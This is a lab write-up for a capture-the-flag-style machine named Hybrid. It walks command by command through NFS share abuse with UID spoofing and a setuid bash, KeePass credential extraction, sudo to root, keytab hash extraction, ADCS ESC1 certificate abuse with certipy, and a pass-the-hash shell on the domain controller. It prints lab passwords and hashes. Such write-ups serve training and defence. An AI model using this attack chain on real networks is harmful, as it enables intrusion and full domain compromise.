nmap -p- -A --open -T5 -Pn -n -oN ext_hybrid_tcp_allports -vvv --min-rate 3000 10.10.141.149-150
#10.10.141.149
53/tcp open tcpwrapped syn-ack
135/tcp open tcpwrapped syn-ack
139/tcp open tcpwrapped syn-ack
445/tcp open tcpwrapped syn-ack
3389/tcp open tcpwrapped syn-ack
9389/tcp open tcpwrapped syn-ack
49667/tcp open tcpwrapped syn-ack
49670/tcp open tcpwrapped syn-ack
#10.10.141.150
22/tcp open tcpwrapped syn-ack
25/tcp open tcpwrapped syn-ack
80/tcp open tcpwrapped syn-ack
110/tcp open tcpwrapped syn-ack
111/tcp open tcpwrapped syn-ack
143/tcp open tcpwrapped syn-ack
993/tcp open tcpwrapped syn-ack
995/tcp open tcpwrapped syn-ack
2049/tcp open nfs
35407/tcp open tcpwrapped syn-ack
Initial Enumeration
Enumerating the network file system
showmount -e 10.10.141.150
Export list for 10.10.141.150:
/opt/share *
Mounting the network file system
mkdir share
sudo mount -t nfs 10.10.141.150:/opt/share share -o nolock
cp share/backup.tar.gz .
tar -xvf backup.tar.gz
Roundcube version 1.6.1 and prior has a vulnerability in markasjunk plugin allows attackers that send a specially crafted identity email address to cause the plugin to execute arbitrary code.
Exploitation
Modifying the user's email field to abuse the RCE.
To escalate privileges, the tester leveraged an NFS share misconfiguration that allowed file manipulation using the www-data account. The exploitation flow was as follows:
UID Spoofing:
On the tester's machine, a local user was created with the same UID as the target user peter.turner@hybrid.vl (UID: 902601108) to impersonate them over the NFS share:
Abusing NFS Share with www-data:
The compromised www-data account had write access to a shared NFS directory. A custom Bash binary was placed into the NFS share from this account.
Setting the SetUID Bit (on Attacker's Machine):
From the attacker-controlled machine (where the spoofed user existed), the tester moved the Bash binary to a temporary directory (e.g., /tmp), modified its permissions to include the setuid bit, and moved it back into the NFS directory:
chmod u+s bash
mv bash /path/to/nfs/share/
Privilege Escalation:
Back on the target machine, the www-data account executed the Bash binary with elevated privileges using the -p flag:
./bash -p
This resulted in a shell running with the effective UID of peter.turner@hybrid.vl, allowing privilege escalation.
Privilege Escalation to root on mail01
Finding a Keepass database
Inside the peter.turner@hybrid.vl 's directory there was a keepass database file. I moved to my machine and extracted the credentials due reusing credentials.
❯ kpcli --kdb=passwords.kdbx
Provide the master password: *************************
kpcli:/> cd hybrid.vl
kpcli:/hybrid.vl> ls
=== Entries ===
0. domain
1. mail mail01.hybrid.vl
kpcli:/hybrid.vl> show 0
Title: domain
Uname: peter.turner
Pass: b0cwR+G4Dzl_rw
URL:
Notes:
Abusing the sudoers configuration
peter.turner@hybrid.vl@mail01:~$ sudo -l
Matching Defaults entries for peter.turner@hybrid.vl on mail01:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User peter.turner@hybrid.vl may run the following commands on mail01:
(ALL) ALL
peter.turner@hybrid.vl@mail01:~$ sudo su
root@mail01:/home/peter.turner@hybrid.vl#
Compromising Domain controller
Discovering Domain Computers is vulnerable to ESC1
❯ certipy-ad find -u peter.turner -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.219.181 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : hybrid-DC01-CA
DNS Name : dc01.hybrid.vl
Certificate Subject : CN=hybrid-DC01-CA, DC=hybrid, DC=vl
Certificate Serial Number : 7D22C8F2760BC48A4E57B5E94984304B
Certificate Validity Start : 2023-06-17 14:04:39+00:00
Certificate Validity End : 2125-04-03 23:35:28+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : HYBRID.VL\Administrators
Access Rights
ManageCertificates : HYBRID.VL\Administrators
HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
ManageCa : HYBRID.VL\Administrators
HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
Enroll : HYBRID.VL\Authenticated Users
Certificate Templates
0
Template Name : HybridComputers
Display Name : HybridComputers
Certificate Authorities : hybrid-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 100 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : HYBRID.VL\Domain Admins
HYBRID.VL\Domain Computers
HYBRID.VL\Enterprise Admins
Object Control Permissions
Owner : HYBRID.VL\Administrator
Write Owner Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
Write Dacl Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
Write Property Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
[!] Vulnerabilities
ESC1 : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
Extracting the Compromised Computer NT Hash to abuse the ESC1
python3 keytabextract.py /home/Intrusionz3r0/Documents/Hybrid/krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HYBRID.VL
SERVICE PRINCIPAL : MAIL01$/
NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
AES-128 HASH : 3a732454c95bcef529167b6bea476458
Abusing the ESC1 to compromise domain controler.
❯ certipy-ad req -u 'MAIL01$' -hashes :0f916c5246fdbc7ba95dcef4126d57bd -dc-ip 10.10.219.181 -ca hybrid-DC01-CA -template HybridComputers -upn Administrator -key-size 4096 2>/dev/null
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
❯ certipy-ad auth -username Administrator -dc-ip 10.10.219.181 -pfx administrator.pfx -domain hybrid.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': aad3b435b51404eeaad3b435b51404ee:60701e8543c9f6db1a2af3217386d3dc
Obtaining a shell as Administrator on DC01
❯ impacket-wmiexec hybrid.vl/Administrator@10.10.219.181 -hashes :60701e8543c9f6db1a2af3217386d3dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
hybrid\administrator
C:\>hostname
dc01
C:\>
